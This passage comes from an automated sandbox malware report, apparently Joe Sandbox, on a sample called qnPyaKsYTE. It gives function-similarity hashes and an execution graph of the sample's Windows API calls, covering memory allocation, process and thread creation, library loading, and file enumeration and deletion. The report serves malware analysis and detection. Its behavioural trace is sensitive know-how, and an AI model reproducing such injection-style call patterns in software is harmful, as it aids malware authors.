                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $i$l$o$u
                                                                                                                                                                                                                                                • API String ID: 0-2051669658
                                                                                                                                                                                                                                                • Opcode ID: 65bd7dc98b8dce5f2dd632719bfa201156f761a5b048c79cf3a0a3496b93613e
                                                                                                                                                                                                                                                • Instruction ID: e987c4606352454cb52751320398172c3f59c092201b4f2eddddfbefcb462d74
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65bd7dc98b8dce5f2dd632719bfa201156f761a5b048c79cf3a0a3496b93613e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3741F8B1900248AFDB24DFA4CC84FEFBBF9EF89704F108559E515A7240E771AA45CBA0
                                                                                                                                                                                                                                                Function 041837FA Relevance: 6.3, Strings: 5, Instructions: 23COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .d(%$.d(%;,$;,$F9p{$p{8@
                                                                                                                                                                                                                                                • API String ID: 0-1236092993
                                                                                                                                                                                                                                                • Opcode ID: 2ff7f7e7e2d80f21d02d47ed7d1ea2f541cbe7775f82d595bea2b9173ec91551
                                                                                                                                                                                                                                                • Instruction ID: 6a7d348eb514ccbe60bce02f02e729dd60cee31fb6b49b4d433227fc12ebfa75
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ff7f7e7e2d80f21d02d47ed7d1ea2f541cbe7775f82d595bea2b9173ec91551
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0E092B480424CABDB04EFE499819EEBB74EB05200F104E99D9659B341E7B4AA148BC5
                                                                                                                                                                                                                                                Function 04199D2A Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$k$o
                                                                                                                                                                                                                                                • API String ID: 0-3624523832
                                                                                                                                                                                                                                                • Opcode ID: 846e8955d662b2c53427b407a5131d1d28a57e9411aa170e0e3c100ba3388207
                                                                                                                                                                                                                                                • Instruction ID: 04616134973032784fbd4363c00b65ce6e3c3cf457dd9b7bd4e611f00decae2b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 846e8955d662b2c53427b407a5131d1d28a57e9411aa170e0e3c100ba3388207
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25B1EAB5A00208AFDB24DFA8CC85FEFB7F9AF88704F148558F65997240D775AE418B90
                                                                                                                                                                                                                                                Function 0419A65A Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$h$o
                                                                                                                                                                                                                                                • API String ID: 0-3662636641
                                                                                                                                                                                                                                                • Opcode ID: d9c8012aec8b5fc9a42adcb7af5ce6bb7faba71e01f74a1b5928f227438aaea0
                                                                                                                                                                                                                                                • Instruction ID: 988770be01f33e128c5349e0a10334fae7bedc565df3b1d4ee5296adc9ab4545
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9c8012aec8b5fc9a42adcb7af5ce6bb7faba71e01f74a1b5928f227438aaea0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D38151B6805258AAEB14EB90CCC4FEE737DEF48704F04459DE609A6140EB747B988FA1
                                                                                                                                                                                                                                                Function 04199D27 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$k$o
                                                                                                                                                                                                                                                • API String ID: 0-3624523832
                                                                                                                                                                                                                                                • Opcode ID: b6e7ac87a6140bbb473a38c70dc3a5c58571fad759f2adf5060e949e8e18d48d
                                                                                                                                                                                                                                                • Instruction ID: 78ae645e370e9b216e6b8834bc827b17532152bbb757ea3f8dad4b48b81df51f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6e7ac87a6140bbb473a38c70dc3a5c58571fad759f2adf5060e949e8e18d48d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E16118B5A00308AFDB14DFA4CC85FAFB7F9AF89704F108558E6599B244D771AA41CB60
                                                                                                                                                                                                                                                Function 04199BE8 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                                                                                                                                • API String ID: 0-2877786613
                                                                                                                                                                                                                                                • Opcode ID: 1270dff6d2d2082d6fe1e792f475fc7e5f7fd4a749b31a7797e843bad9ba231a
                                                                                                                                                                                                                                                • Instruction ID: 00688aae80720d126f6c4990dd82e83f0a7a21c698f2ed09705856ab91e253cb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1270dff6d2d2082d6fe1e792f475fc7e5f7fd4a749b31a7797e843bad9ba231a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B73150B5915298BAFB11EB90CD81FEF7B7CEF55704F004049FA046A180E7747A5287B6
                                                                                                                                                                                                                                                Function 04199BEA Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                                                                                                                                • API String ID: 0-2877786613
                                                                                                                                                                                                                                                • Opcode ID: d2b82c884509310a4f1d4186fd8f8701f51ad73b7df08b1d110e59f45bf531f2
                                                                                                                                                                                                                                                • Instruction ID: 167a3d1b90dc312cf95d0a24aa52a919a2747c7a49764ba5bb7983512eec3dea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2b82c884509310a4f1d4186fd8f8701f51ad73b7df08b1d110e59f45bf531f2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13415EB5911298BAFB11EB90CC81FEF7B7CEF55704F004049FA046A180E7747A5187A6
                                                                                                                                                                                                                                                Function 0419A652 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$h$o
                                                                                                                                                                                                                                                • API String ID: 0-3662636641
                                                                                                                                                                                                                                                • Opcode ID: fac27378af7a7788f16bfc0a70d19e8fdcd50edf5c597d6efa36b244db357be2
                                                                                                                                                                                                                                                • Instruction ID: 7bd3ff7264fc0c014ee11eba3106384e68e0c9843ff6b8bb1e718758db7f5bbb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fac27378af7a7788f16bfc0a70d19e8fdcd50edf5c597d6efa36b244db357be2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3415FB1C05358AAEB14EBA4CC84FEEB7B9EF48704F00459DE50DA6150EB747B848FA1
                                                                                                                                                                                                                                                Function 0419730B Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$k$o
                                                                                                                                                                                                                                                • API String ID: 0-3624523832
                                                                                                                                                                                                                                                • Opcode ID: 75f178322defb033c4f7c37244d77401c9ae8fc1cdfa612868806c8517a2649b
                                                                                                                                                                                                                                                • Instruction ID: 094e107eb06d6d2233c7a94176eb34423149c004a63db64d7f4704580b8b814e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75f178322defb033c4f7c37244d77401c9ae8fc1cdfa612868806c8517a2649b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0611C6B2900218EFDF14DF94D8C5ADEBBF9FF09304F048259E9159B105E771A945CBA0
                                                                                                                                                                                                                                                Function 0419731A Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $e$k$o
                                                                                                                                                                                                                                                • API String ID: 0-3624523832
                                                                                                                                                                                                                                                • Opcode ID: 3fb1dcc21cc91a4b041918479df166f89adabaa798cda0c0ac0c735a21ca4bdb
                                                                                                                                                                                                                                                • Instruction ID: b2ca82e1a829f315d1dbb54b7eea9dfa9bbb1265c3b455b91bf496c7bb75648f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fb1dcc21cc91a4b041918479df166f89adabaa798cda0c0ac0c735a21ca4bdb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B0196B2900218EBDB14DF98D8C4ADEF7B9FF08714F048259E9155B205E771F945CBA0

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:2.6%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:4.1%
                                                                                                                                                                                                                                                Signature Coverage:2.2%
                                                                                                                                                                                                                                                Total number of Nodes:458
                                                                                                                                                                                                                                                Total number of Limit Nodes:75
                                                                                                                                                                                                                                                execution_graph 97116 2f29ab0 97117 2f29abf 97116->97117 97118 2f29afd 97117->97118 97119 2f29aea CreateThread 97117->97119 97120 2f2b3b0 97123 2f4b140 97120->97123 97122 2f2ca21 97126 2f49280 97123->97126 97125 2f4b171 97125->97122 97127 2f49315 97126->97127 97129 2f492ab 97126->97129 97128 2f4932b NtAllocateVirtualMemory 97127->97128 97128->97125 97129->97125 96785 2f3aaf0 96790 2f3a800 96785->96790 96787 2f3aafd 96806 2f3a480 96787->96806 96789 2f3ab19 96791 2f3a825 96790->96791 96818 2f38120 96791->96818 96794 2f3a970 96794->96787 96796 2f3a987 96796->96787 96798 2f3a97e 96798->96796 96801 2f3aa75 96798->96801 96837 2f44be0 96798->96837 96842 2f39ed0 96798->96842 96800 2f44be0 GetFileAttributesW 96800->96801 96801->96800 96803 2f3aada 96801->96803 96851 2f3a240 96801->96851 96855 2f4b1d0 96803->96855 96807 2f3a496 96806->96807 96810 2f3a4a1 96806->96810 96808 2f4b2b0 RtlAllocateHeap 96807->96808 96808->96810 96809 2f3a4c2 96809->96789 96810->96809 96811 2f38120 GetFileAttributesW 96810->96811 96812 2f3a7d2 96810->96812 96815 2f44be0 GetFileAttributesW 96810->96815 96816 2f39ed0 RtlFreeHeap 96810->96816 96817 2f3a240 RtlFreeHeap 96810->96817 96811->96810 96813 2f3a7eb 96812->96813 96814 2f4b1d0 RtlFreeHeap 96812->96814 96813->96789 96814->96813 96815->96810 96816->96810 96817->96810 96819 2f3813f 96818->96819 96820 2f38146 GetFileAttributesW 96819->96820 96821 2f38151 96819->96821 96820->96821 96821->96794 96822 2f43130 96821->96822 96823 2f4313e 96822->96823 96824 2f43145 96822->96824 96823->96798 96858 2f34310 96824->96858 96826 2f43177 96827 2f43186 96826->96827 96866 2f42bf0 LdrLoadDll 96826->96866 96833 2f43334 96827->96833 96863 2f4b2b0 96827->96863 96830 2f4319f 96831 2f4332a 96830->96831 96830->96833 96834 2f431bb 96830->96834 96832 2f4b1d0 RtlFreeHeap 96831->96832 96831->96833 96832->96833 96833->96798 96834->96833 96835 2f4b1d0 RtlFreeHeap 96834->96835 96836 2f4331e 96835->96836 96836->96798 96838 2f44c45 96837->96838 96839 2f44c7c 96838->96839 96870 2f38160 96838->96870 96839->96798 96841 2f44c5e 96841->96798 96843 2f39ef6 96842->96843 96875 2f3d910 96843->96875 96845 2f39f68 96847 2f39f86 96845->96847 96848 2f3a0f0 96845->96848 96846 2f3a0d5 96846->96798 96847->96846 96880 2f39d90 96847->96880 96848->96846 96849 2f39d90 RtlFreeHeap 96848->96849 96849->96848 96852 2f3a266 96851->96852 96853 2f3d910 RtlFreeHeap 96852->96853 96854 2f3a2ed 96853->96854 96854->96801 96888 2f49490 96855->96888 96857 2f3aae1 96857->96787 96860 2f34334 96858->96860 96859 2f3433b 96859->96826 96860->96859 96861 2f34370 LdrLoadDll 96860->96861 96862 2f34387 96860->96862 96861->96862 96862->96826 96867 2f49440 96863->96867 96865 2f4b2c8 96865->96830 96866->96827 96868 2f4945d 96867->96868 96869 2f4946e RtlAllocateHeap 96868->96869 96869->96865 96871 2f38173 96870->96871 96872 2f3813d 96870->96872 96873 2f38146 GetFileAttributesW 96872->96873 96874 2f38151 96872->96874 96873->96874 96874->96841 96877 2f3d934 96875->96877 96876 2f3d941 96876->96845 96877->96876 96878 2f4b1d0 RtlFreeHeap 96877->96878 96879 2f3d97e 96878->96879 96879->96845 96881 2f39dad 96880->96881 96884 2f3d990 96881->96884 96883 2f39eb3 96883->96847 96885 2f3d9b4 96884->96885 96886 2f3da5e 96885->96886 96887 2f4b1d0 RtlFreeHeap 96885->96887 96886->96883 96887->96886 96889 2f494aa 96888->96889 96890 2f494bb RtlFreeHeap 96889->96890 96890->96857 97130 2f36b30 97131 2f36b5a 97130->97131 97134 2f37cf0 97131->97134 97133 2f36b7e 97135 2f37d0d 97134->97135 97141 2f48840 97135->97141 97137 2f37d5d 97138 2f37d64 97137->97138 97139 2f48920 LdrInitializeThunk 97137->97139 97138->97133 97140 2f37d8d 97139->97140 97140->97133 97142 2f488db 97141->97142 97143 2f4886b 97141->97143 97146 3882f30 LdrInitializeThunk 97142->97146 97143->97137 97144 2f48914 97144->97137 97146->97144 96891 2f49070 96892 2f49098 96891->96892 96893 2f490e4 96891->96893 96894 2f490fa NtDeleteFile 96893->96894 96895 2f4c3f0 96896 2f4b1d0 RtlFreeHeap 96895->96896 96897 2f4c405 96896->96897 97147 2f418b0 97150 2f418c9 97147->97150 97148 2f41956 97149 2f41911 97151 2f4b1d0 RtlFreeHeap 97149->97151 97150->97148 97150->97149 97153 2f41951 97150->97153 97152 2f41921 97151->97152 97154 2f4b1d0 RtlFreeHeap 97153->97154 97154->97148 97155 2f399bf 97156 2f399d6 97155->97156 97157 2f399db 97155->97157 97158 2f39a0d 97157->97158 97159 2f4b1d0 RtlFreeHeap 97157->97159 97159->97158 96898 2f3fee0 96899 2f3fefd 96898->96899 96900 2f34310 LdrLoadDll 96899->96900 96901 2f3ff18 96900->96901 96902 2f370e0 96903 2f3714c 96902->96903 96904 2f370f5 96902->96904 96904->96903 96906 2f3b020 96904->96906 96907 2f3b046 96906->96907 96912 2f3b26a 96907->96912 96933 2f49520 96907->96933 96909 2f3b0bf 96909->96912 96936 2f4c4c0 96909->96936 96911 2f3b0de 96911->96912 96913 2f3b1a9 96911->96913 96942 2f48750 96911->96942 96912->96903 96915 2f358e0 LdrInitializeThunk 96913->96915 96917 2f3b1c5 96913->96917 96915->96917 96919 2f3b252 96917->96919 96953 2f482c0 96917->96953 96918 2f3b191 96949 2f37ec0 96918->96949 96926 2f37ec0 LdrInitializeThunk 96919->96926 96921 2f3b146 96921->96912 96921->96918 96922 2f3b172 96921->96922 96946 2f358e0 96921->96946 96968 2f44520 LdrInitializeThunk 96922->96968 96929 2f3b260 96926->96929 96928 2f3b229 96958 2f48370 96928->96958 96929->96903 96931 2f3b243 96963 2f484d0 96931->96963 96934 2f4953a 96933->96934 96935 2f4954b CreateProcessInternalW 96934->96935 96935->96909 96937 2f4c430 96936->96937 96938 2f4b2b0 RtlAllocateHeap 96937->96938 96939 2f4c48d 96937->96939 96940 2f4c46a 96938->96940 96939->96911 96941 2f4b1d0 RtlFreeHeap 96940->96941 96941->96939 96943 2f4876a 96942->96943 96969 3882c0a 96943->96969 96944 2f3b13d 96944->96913 96944->96921 96972 2f48920 96946->96972 96948 2f3591b 96948->96922 96950 2f37ed3 96949->96950 96978 2f48650 96950->96978 96952 2f37efe 96952->96903 96954 2f4833a 96953->96954 96956 2f482e8 96953->96956 96984 38839b0 LdrInitializeThunk 96954->96984 96955 2f4835f 96955->96928 96956->96928 96959 2f483ed 96958->96959 96960 2f4839b 96958->96960 96985 3884340 LdrInitializeThunk 96959->96985 96960->96931 96961 2f48412 96961->96931 96964 2f4854d 96963->96964 96965 2f484fb 96963->96965 96986 3882fb0 LdrInitializeThunk 96964->96986 96965->96919 96966 2f48572 96966->96919 96968->96918 96970 3882c1f LdrInitializeThunk 96969->96970 96971 3882c11 96969->96971 96970->96944 96971->96944 96973 2f489ce 96972->96973 96975 2f4894c 96972->96975 96977 3882d10 LdrInitializeThunk 96973->96977 96974 2f48a13 96974->96948 96975->96948 96977->96974 96979 2f4867b 96978->96979 96980 2f486ce 96978->96980 96979->96952 96983 3882dd0 LdrInitializeThunk 96980->96983 96981 2f486f3 96981->96952 96983->96981 96984->96955 96985->96961 96986->96966 96987 2f3f5e0 96988 2f3f644 96987->96988 97016 2f36070 96988->97016 96990 2f3f77e 96991 2f3f777 96991->96990 97023 2f36180 96991->97023 96993 2f3f923 96994 2f3f7fa 96994->96993 96995 2f3f932 96994->96995 97027 2f3f3c0 96994->97027 96996 2f49110 NtClose 96995->96996 96998 2f3f93c 96996->96998 96999 2f3f836 96999->96995 97000 2f3f841 96999->97000 97001 2f4b2b0 RtlAllocateHeap 97000->97001 97002 2f3f86a 97001->97002 97003 2f3f873 97002->97003 97004 2f3f889 97002->97004 97006 2f49110 NtClose 97003->97006 97036 2f3f2b0 CoInitialize 97004->97036 97007 2f3f87d 97006->97007 97008 2f3f897 97039 2f48bd0 97008->97039 97010 2f3f912 97043 2f49110 97010->97043 97012 2f3f91c 97013 2f4b1d0 RtlFreeHeap 97012->97013 97013->96993 97014 2f3f8b5 97014->97010 97015 2f48bd0 LdrInitializeThunk 97014->97015 97015->97014 97017 2f360a3 97016->97017 97018 2f360c7 97017->97018 97046 2f48c70 97017->97046 97018->96991 97020 2f360ea 97020->97018 97021 2f49110 NtClose 97020->97021 97022 2f36168 97021->97022 97022->96991 97024 2f361a5 97023->97024 97051 2f48a60 97024->97051 97028 2f3f3dc 97027->97028 97029 2f34310 LdrLoadDll 97028->97029 97031 2f3f3f7 97029->97031 97030 2f3f400 97030->96999 97031->97030 97032 2f34310 LdrLoadDll 97031->97032 97033 2f3f4cb 97032->97033 97034 2f34310 LdrLoadDll 97033->97034 97035 2f3f528 97033->97035 97034->97035 97035->96999 97038 2f3f315 97036->97038 97037 2f3f3ab CoUninitialize 97037->97008 97038->97037 97040 2f48bea 97039->97040 97056 3882ba0 LdrInitializeThunk 97040->97056 97041 2f48c1a 97041->97014 97044 2f4912a 97043->97044 97045 2f4913b NtClose 97044->97045 97045->97012 97047 2f48c8a 97046->97047 97050 3882ca0 LdrInitializeThunk 97047->97050 97048 2f48cb6 97048->97020 97050->97048 97052 2f48a7a 97051->97052 97055 3882c60 LdrInitializeThunk 97052->97055 97053 2f36219 97053->96994 97055->97053 97056->97041 97057 2f35960 97058 2f37ec0 LdrInitializeThunk 97057->97058 97059 2f35990 97058->97059 97061 2f359bc 97059->97061 97062 2f37e40 97059->97062 97063 2f37e84 97062->97063 97064 2f37ea5 97063->97064 97069 2f48420 97063->97069 97064->97059 97066 2f37e95 97067 2f37eb1 97066->97067 97068 2f49110 NtClose 97066->97068 97067->97059 97068->97064 97070 2f4849a 97069->97070 97072 2f48448 97069->97072 97074 3884650 LdrInitializeThunk 97070->97074 97071 2f484bf 97071->97066 97072->97066 97074->97071 97160 2f320a0 97161 2f320b6 97160->97161 97162 2f48750 LdrInitializeThunk 97161->97162 97163 2f320d6 97162->97163 97166 2f491b0 97163->97166 97165 2f320eb 97167 2f4923f 97166->97167 97168 2f491db 97166->97168 97171 3882e80 LdrInitializeThunk 97167->97171 97168->97165 97169 2f49270 97169->97165 97171->97169 97182 2f41520 97183 2f4153c 97182->97183 97184 2f41564 97183->97184 97185 2f41578 97183->97185 97186 2f49110 NtClose 97184->97186 97187 2f49110 NtClose 97185->97187 97188 2f4156d 97186->97188 97189 2f41581 97187->97189 97192 2f4b2f0 RtlAllocateHeap 97189->97192 97191 2f4158c 97192->97191 97198 3882ad0 LdrInitializeThunk 97199 2f29b10 97200 2f29ee8 97199->97200 97202 2f2a3cf 97200->97202 97203 2f4ae30 97200->97203 97204 2f4ae56 97203->97204 97209 2f24120 97204->97209 97206 2f4ae62 97207 2f4ae9b 97206->97207 97212 2f45390 97206->97212 97207->97202 97216 2f32fd0 97209->97216 97211 2f2412d 97211->97206 97213 2f453f2 97212->97213 97215 2f453ff 97213->97215 97227 2f31800 97213->97227 97215->97207 97217 2f32fed 97216->97217 97219 2f33003 97217->97219 97220 2f49b80 97217->97220 97219->97211 97222 2f49b9a 97220->97222 97221 2f49bc9 97221->97219 97222->97221 97223 2f48750 LdrInitializeThunk 97222->97223 97224 2f49c29 97223->97224 97225 2f4b1d0 RtlFreeHeap 97224->97225 97226 2f49c42 97225->97226 97226->97219 97228 2f3183b 97227->97228 97243 2f37c50 97228->97243 97230 2f31843 97231 2f4b2b0 RtlAllocateHeap 97230->97231 97241 2f31b0d 97230->97241 97232 2f31859 97231->97232 97233 2f4b2b0 RtlAllocateHeap 97232->97233 97234 2f31867 97233->97234 97235 2f4b2b0 RtlAllocateHeap 97234->97235 97237 2f31878 97235->97237 97242 2f31909 97237->97242 97258 2f367d0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97237->97258 97238 2f34310 LdrLoadDll 97239 2f31abf 97238->97239 97254 2f47cd0 97239->97254 97241->97215 97242->97238 97244 2f37c7c 97243->97244 97245 2f37b40 2 API calls 97244->97245 97246 2f37c9f 97245->97246 97247 2f37cc1 97246->97247 97248 2f37ca9 97246->97248 97250 2f37cdd 97247->97250 97252 2f49110 NtClose 97247->97252 97249 2f37cb4 97248->97249 97251 2f49110 NtClose 97248->97251 97249->97230 97250->97230 97251->97249 97253 2f37cd3 97252->97253 97253->97230 97255 2f47d31 97254->97255 97257 2f47d3e 97255->97257 97259 2f31b20 97255->97259 97257->97241 97258->97242 97275 2f37f20 97259->97275 97261 2f31b40 97268 2f32086 97261->97268 97279 2f40ef0 97261->97279 97264 2f31d54 97266 2f4c4c0 2 API calls 97264->97266 97265 2f31b9e 97265->97268 97282 2f4c390 97265->97282 97269 2f31d69 97266->97269 97267 2f37ec0 LdrInitializeThunk 97271 2f31db6 97267->97271 97268->97257 97269->97271 97287 2f30670 97269->97287 97271->97267 97271->97268 97272 2f30670 LdrInitializeThunk 97271->97272 97272->97271 97273 2f31f07 97273->97271 97274 2f37ec0 LdrInitializeThunk 97273->97274 97274->97273 97276 2f37f2d 97275->97276 97277 2f37f53 97276->97277 97278 2f37f4c SetErrorMode 97276->97278 97277->97261 97278->97277 97280 2f4b140 NtAllocateVirtualMemory 97279->97280 97281 2f40f11 97280->97281 97281->97265 97283 2f4c3a6 97282->97283 97284 2f4c3a0 97282->97284 97285 2f4b2b0 RtlAllocateHeap 97283->97285 97284->97264 97286 2f4c3cc 97285->97286 97286->97264 97290 2f493a0 97287->97290 97291 2f493bd 97290->97291 97294 3882c70 LdrInitializeThunk 97291->97294 97292 2f30692 97292->97273 97294->97292 97075 2f30bd0 97076 2f30bea 97075->97076 97077 2f34310 LdrLoadDll 97076->97077 97078 2f30c05 97077->97078 97079 2f30c4a 97078->97079 97080 2f30c39 PostThreadMessageW 97078->97080 97080->97079 97295 2f3c390 97296 2f3c3b9 97295->97296 97297 2f3c4bc 97296->97297 97298 2f3c460 FindFirstFileW 97296->97298 97298->97297 97301 2f3c47b 97298->97301 97299 2f3c4a3 FindNextFileW 97300 2f3c4b5 FindClose 97299->97300 97299->97301 97300->97297 97301->97299 97081 2f457d0 97082 2f45835 97081->97082 97083 2f45870 97082->97083 97086 2f411c0 97082->97086 97085 2f45852 97088 2f4116c 97086->97088 97090 2f4121c 97086->97090 97087 2f49110 NtClose 97089 2f411af 97087->97089 97088->97087 97088->97090 97089->97085 97090->97085 97302 2f48e10 97303 2f48e3c 97302->97303 97304 2f48ec4 97302->97304 97305 2f48eda NtCreateFile 97304->97305 97091 2f32555 97092 2f32575 97091->97092 97093 2f36070 2 API calls 97092->97093 97094 2f32580 97093->97094 97306 2f32114 97307 2f320d3 97306->97307 97308 2f32131 97306->97308 97309 2f320eb 97307->97309 97310 2f491b0 LdrInitializeThunk 97307->97310 97310->97309 97095 2f32edc 97100 2f37b40 97095->97100 97098 2f49110 NtClose 97099 2f32f08 97098->97099 97101 2f37b5a 97100->97101 97105 2f32eec 97100->97105 97106 2f487f0 97101->97106 97104 2f49110 NtClose 97104->97105 97105->97098 97105->97099 97107 2f4880a 97106->97107 97110 38835c0 LdrInitializeThunk 97107->97110 97108 2f37c2a 97108->97104 97110->97108 97313 2f36f00 97314 2f36f19 97313->97314 97318 2f36f69 97313->97318 97316 2f49110 NtClose 97314->97316 97314->97318 97315 2f3709e 97317 2f36f34 97316->97317 97323 2f36300 NtClose LdrInitializeThunk LdrInitializeThunk 97317->97323 97318->97315 97324 2f36300 NtClose LdrInitializeThunk LdrInitializeThunk 97318->97324 97320 2f37078 97320->97315 97325 2f364d0 NtClose LdrInitializeThunk 